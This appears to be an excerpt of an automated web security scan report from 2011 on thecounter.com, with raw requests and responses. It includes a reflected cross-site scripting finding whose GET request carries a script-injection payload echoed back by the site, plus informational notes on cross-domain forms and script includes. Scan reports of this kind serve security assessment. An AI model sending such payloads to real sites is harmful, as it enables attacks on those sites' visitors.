1. Cross-site scripting (reflected)
3. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | http://www.thecounter.com |
Path: | / |
GET /?6955f--><script>alert(1)< Host: www.thecounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:00:56 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 41197 <html> <head> <title>TheCounter.com - The Affordable Web Site Analysis Tool</title> <!-- test test --> <LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css"> <meta http-equiv="Content-Type" con ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.thecounter.com with position ciu url: /?6955f--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thecounter.com |
Path: | / |
GET / HTTP/1.1 Host: www.thecounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:00:55 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 40982 <html> <head> <title>TheCounter.com - The Affordable Web Site Analysis Tool</title> <!-- test test --> <LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css"> <meta http-equiv="Content-Type" con ...[SNIP]... </p> <form method="POST" action="http://search <input type="HIDDEN" name="IC_Summary" value="1"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thecounter.com |
Path: | / |
GET / HTTP/1.1 Host: www.thecounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:00:55 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 40982 <html> <head> <title>TheCounter.com - The Affordable Web Site Analysis Tool</title> <!-- test test --> <LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css"> <meta http-equiv="Content-Type" con ...[SNIP]... </SCRIPT><script language="javascript" src="http://e1.cdn.qnsr <script language="javascript" src="http://e1.cdn.qnsr <script language="JavaScript" src="http://e1.cdn.qnsr ...[SNIP]... |